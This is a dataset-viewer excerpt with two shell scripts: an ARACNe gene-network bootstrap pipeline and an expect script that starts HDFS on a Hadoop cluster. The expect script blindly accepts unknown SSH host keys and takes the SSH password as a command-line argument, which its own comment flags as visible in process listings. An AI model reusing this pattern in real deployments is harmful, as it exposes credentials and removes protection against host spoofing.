java -Xmx5G -jar Aracne.jar -e "$DATA/expression_lung.txt" -o outputFolder --tfs "$DATA/regulators.txt" --pvalue 1E-8 --seed 1 --calculateThreshold

# Phase 2: run 100 reproducible bootstraps (seed = bootstrap index).
for i in {1..100}; do
  java -Xmx5G -jar Aracne.jar -e "$DATA/expression_lung.txt" -o outputFolder --tfs "$DATA/regulators.txt" --pvalue 1E-8 --threads 2 --seed "$i"
done

# Phase 3: consolidate the bootstraps in the output folder.
java -Xmx5G -jar Aracne.jar -o outputFolder --consolidate
| true |
ed9bf2bb87c09ae543c319fa618446e1a650827d | Shell | lueyoung/hadoop-on-k8s | /scripts/start-dfs-yes.sh | UTF-8 | 597 | 2.71875 | 3 | [] | no_license | #!/usr/bin/expect
# Starts HDFS non-interactively by driving start-dfs.sh with 'expect',
# answering first-connect host-key prompts and ssh password prompts.
# Usage: start-dfs-yes.sh <ssh-password>
# NOTE(review): the password is passed on the command line and is visible
# in 'ps' output - consider a safer channel; confirm with the deployment.
set password [lindex $argv 0]
spawn /opt/hadoop/sbin/start-dfs.sh
expect {
        #first connect, no public key in ~/.ssh/known_hosts
        "Are you sure you want to continue connecting (yes/no)?" {
        send "yes\r"
        expect "password:"
        send "$password\r"
        }
        #already has public key in ~/.ssh/known_hosts
        "password:" {
        send "$password\r"
        }
        "Now try logging into the machine" {
        #it has authorized, do nothing!
        }
}
# Wait for start-dfs.sh to finish before exiting.
expect eof
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.